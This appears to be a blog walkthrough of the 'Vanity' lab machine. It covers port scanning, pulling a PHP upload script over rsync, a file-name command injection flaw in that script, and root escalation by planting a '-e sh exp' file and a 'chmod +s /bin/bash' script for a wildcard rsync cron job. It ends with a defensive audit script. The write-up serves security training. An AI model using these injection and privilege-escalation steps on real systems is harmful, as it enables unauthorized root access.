
Vanity Intermediate: wildcard privilege escalation

Date: 2024-11-09 14:46:09

nmap scan
┌──(root㉿kali)-[~]
└─# nmap -p- -A 192.168.167.234
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)
Nmap scan report for 192.168.167.234
Host is up (0.072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT      ADDRESS
1   69.74 ms 192.168.45.1
2   69.54 ms 192.168.45.254
3   71.50 ms 192.168.251.1
4   71.55 ms 192.168.167.234

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds


Reading the web source over rsync
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234 ./rsyn_shared
source          Web Source
backup          Virus Samples Backup
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source       
drwxr-xr-x          4,096 2022/10/25 11:31:36 .
-rw-r--r--          2,814 2022/10/25 11:31:36 index.html
-rw-r--r--            155 2022/10/25 11:31:36 style.css
drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads
-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# rsync  -rdt rsync://192.168.167.234/source/uploads/upload.php
-rw-r--r--            738 2022/10/25 11:31:36 upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─#  rsync  -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php
receiving incremental file list
upload.php

sent 43 bytes  received 834 bytes  250.57 bytes/sec
total size is 738  speedup is 0.84
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# ls
apache_2fa  pass  upload.php
                                                                                                                                                    
┌──(root㉿kali)-[~/lab]
└─# cat upload.php     
<?php

        //Check if the file is well uploaded
        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }


        //Set up valid extension
        $extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');

        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

        //Check if the uploaded file extension is allowed

        if (in_array($extUpload, $extsNotAllowed) ) { 
        echo 'File not allowed'; 

        } 
    else {
        $name = "{$_FILES['file']['name']}";
        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);
        if($result){
            system("/usr/bin/clamscan $name");
        }
    }

?>                                                                                                                                                    

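upload.php passes the client-supplied file name unescaped into system("/usr/bin/clamscan $name"), which is a command execution vulnerability; it was used to get a shell.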

pspy32 shows that a scheduled task runs an rsync command, and that command is open to wildcard privilege escalation.

Privilege escalation through the wildcard
www-data@vanity:/var/www/html/uploads$ rm *
www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp
www-data@vanity:/var/www/html/uploads$ chmod 777 *
www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'
www-data@vanity:/var/www/html/uploads$ ls
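
The session above works because a privileged job expands `*` in a directory that www-data can write to, so a file name beginning with `-` reaches the command as an option. The following is an added example, not part of the original post, showing an audit for such names and the two hardened glob forms; the scheduled job's exact command line is not shown on the page, so `args_parsed_as_options` is a hypothetical stand-in for the tool's option parser and the sample directory is constructed.

```shell
#!/bin/sh
# Added example. Function names and the sample directory are constructed.

# Stand-in for an option-parsing tool such as rsync: counts the arguments it
# would treat as options, stopping at the "--" end-of-options marker.
args_parsed_as_options() (
    n=0
    for a in "$@"; do
        [ "$a" = "--" ] && break
        case "$a" in -?*) n=$((n + 1)) ;; esac
    done
    echo "$n"
)

# Audit helper: print entries in directory $1 whose names begin with "-".
find_optionlike_names() (
    for f in "$1"/-*; do
        if [ -e "$f" ] || [ -L "$f" ]; then printf '%s\n' "${f##*/}"; fi
    done
)

# Expand the same directory three ways, as a scheduled job might.
compare_glob_forms() (
    cd -- "$1" || exit 1
    echo "bare=$(args_parsed_as_options *)"        # unsafe:   cmd *
    echo "dotslash=$(args_parsed_as_options ./*)"  # hardened: cmd ./*
    echo "dashdash=$(args_parsed_as_options -- *)" # hardened: cmd -- *
)

demo() (
    d=$(mktemp -d) || exit 1
    # Constructed sample mirroring the file names in the session above.
    : > "$d/exp"; : > "$d/-e sh exp"; : > "$d/report.txt"
    compare_glob_forms "$d"
    echo "option-like names:"
    find_optionlike_names "$d"
    rm -rf "$d"
)

demo
```

Passing the directory itself to the tool instead of a glob, and keeping that directory unwritable by the web server account, removes the problem at its source.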

From: https://www.cnblogs.com/wssw/p/18536805
